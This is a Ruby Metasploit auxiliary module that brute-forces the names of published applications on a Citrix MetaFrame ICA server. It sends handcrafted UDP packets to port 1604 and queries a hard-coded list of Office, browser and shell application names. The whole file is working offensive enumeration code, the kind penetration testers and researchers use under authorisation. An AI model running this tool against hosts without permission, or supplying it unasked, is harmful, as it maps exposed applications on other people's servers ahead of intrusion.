##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
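class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  # Fixed list of published-application names that #run probes, in this
  # order. Each entry is sent verbatim as the application name field.
  # 'ACROBAR' is kept exactly as it appeared in the original list.
  APPLICATIONS = [
    'TEST',
    'NOTEPAD',
    'ACROBAT READER',
    'ACROBAR',
    'EXPLORER',
    'WORD',
    'WORD2K',
    'WORDXP',
    'WORD2K3',
    'WORD2K7',
    'WORD 2000',
    'WORD XP',
    'WORD 2003',
    'WORD 2007',
    'WORD2000',
    'WORD2003',
    'WORD2007',
    'EXCEL',
    'EXCEL2K',
    'EXCELXP',
    'EXCEL2K3',
    'EXCEL2K7',
    'EXCEL 2000',
    'EXCEL XP',
    'EXCEL 2003',
    'EXCEL 2007',
    'EXCEL2000',
    'EXCEL2003',
    'EXCEL2007',
    'ACCESS',
    'ACCESS2K',
    'ACCESSXP',
    'ACCESS2K3',
    'ACCESS2K7',
    'ACCESS 2000',
    'ACCESS XP',
    'ACCESS 2003',
    'ACCESS 2007',
    'ACCESS2000',
    'ACCESS2003',
    'ACCESS2007',
    'POWERPOINT',
    'POWERPOINT2K',
    'POWERPOINTXP',
    'POWERPOINT2K3',
    'POWERPOINT2K7',
    'POWERPOINT 2000',
    'POWERPOINT XP',
    'POWERPOINT 2003',
    'POWERPOINT 2007',
    'POWERPOINT2000',
    'POWERPOINT2003',
    'POWERPOINT2007',
    'OUTLOOK',
    'OUTLOOKXP',
    'OUTLOOK2K',
    'OUTLOOK2K3',
    'OUTLOOK2K7',
    'OUTLOOK 2000',
    'OUTLOOK XP',
    'OUTLOOK 2003',
    'OUTLOOK 2007',
    'OUTLOOK2000',
    'OUTLOOK2003',
    'OUTLOOK2007',
    'LOTUS',
    'LOTUS NOTES',
    'INTERNETEXPLORER',
    'IE',
    'IEXPLORER',
    'FIREFOX',
    'FIREFOX 3',
    'NETSCAPE',
    'NETSCAPE7',
    'NETSCAPE6',
    'MAIL',
    'EMAIL',
    'E-MAIL',
    'INTERNET',
    'CMD',
    'COMMAND',
  ].freeze

  # All wire constants are forced to binary (.b) so that appending them to
  # packed byte strings and comparing them with socket data never raises
  # Encoding::CompatibilityError, whatever source encoding the file was
  # loaded with. Byte values are unchanged from the original module.

  # First datagram sent; used to check that an ICA service answers on RPORT.
  CLIENT_CONNECT = (
    "\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" \
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  ).b.freeze

  # Expected prefix of the reply to CLIENT_CONNECT.
  SERVER_RESPONSE = "\x30\x00\x02\x31\x02\xfd\xa8\xe3\x02\x00\x06\x44".b.freeze

  # Reply prefix observed when the server publishes the queried application.
  APPLICATION_VALID = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44".b.freeze

  # Reply prefix observed when the application is not found / not published.
  APPLICATION_INVALID = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44".b.freeze

  # Seconds to wait for each UDP reply.
  READ_TIMEOUT = 3

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
      'Description' => %q{
        This module attempts to brute force program names within the Citrix
        Metaframe ICA server.
      },
      'Author' => [ 'aushack' ],
      'References' =>
        [
          [ 'OSVDB', '50617' ],
          [ 'BID', '5817' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(1604),
      ])
  end

  # Opt this module out of automatic module selection; it is meant to be
  # run explicitly against a chosen host.
  def autofilter
    false
  end

  # Sends the connect probe and, if an ICA service answers, queries each
  # name in APPLICATIONS once, reporting Found / NOT Found per reply.
  # The socket is always released via disconnect_udp, even when a socket
  # error or timeout exception escapes the probe loop.
  def run
    connect_udp
    begin
      print_status("Attempting to contact Citrix ICA service...")

      # Client NetBIOS hostname. This works fine >:)
      client = Rex::Text.rand_text_alphanumeric(8)

      udp_sock.put(CLIENT_CONNECT)
      res = udp_sock.get(READ_TIMEOUT)

      # Covers both a non-matching reply and no reply at all (nil / empty).
      unless reply_has_prefix?(res, SERVER_RESPONSE)
        print_error("Server did not respond.")
        return
      end

      print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
      APPLICATIONS.each { |application| probe_application(application, client) }
    ensure
      # disconnect_udp tolerates an unset socket, so this is safe even if
      # connect_udp itself failed.
      disconnect_udp
    end
  end

  private

  # Sends one lookup for +application+ and prints the outcome.
  # A reply that matches neither known prefix (including a read timeout)
  # is only reported in verbose mode.
  def probe_application(application, client)
    udp_sock.put(build_request(application, client))
    res = udp_sock.get(READ_TIMEOUT)

    if reply_has_prefix?(res, APPLICATION_VALID)
      print_status("Found: #{application}")
    elsif reply_has_prefix?(res, APPLICATION_INVALID)
      print_error("NOT Found: #{application}")
    else
      vprint_status("No recognised reply for: #{application}")
    end
  end

  # Builds the lookup request for +application+, using +client+ as the
  # client hostname field.
  #
  # The first byte and the byte at offset 32 are derived from the name
  # length (52 + len and 39 + len, as in the original module) and are each
  # packed as one unsigned byte, so a name longer than 203 bytes would wrap
  # silently. Every entry in APPLICATIONS is far below that limit.
  def build_request(application, client)
    name_len = application.bytesize
    packet = [52 + name_len].pack('C')
    packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00".b
    packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00".b
    packet << [39 + name_len].pack('C')
    packet << "\x00\x00\x00\x00\x00".b
    packet << application.b
    packet << "\x00\x01\x00\x04\x00".b
    packet << client.b
    packet << "\x00".b
    packet
  end

  # True when +data+ (socket read result, possibly nil or empty on timeout)
  # starts with the bytes of +expected+. Comparison is done on raw bytes.
  def reply_has_prefix?(data, expected)
    bytes = data.to_s.b
    bytes[0, expected.length] == expected
  end
end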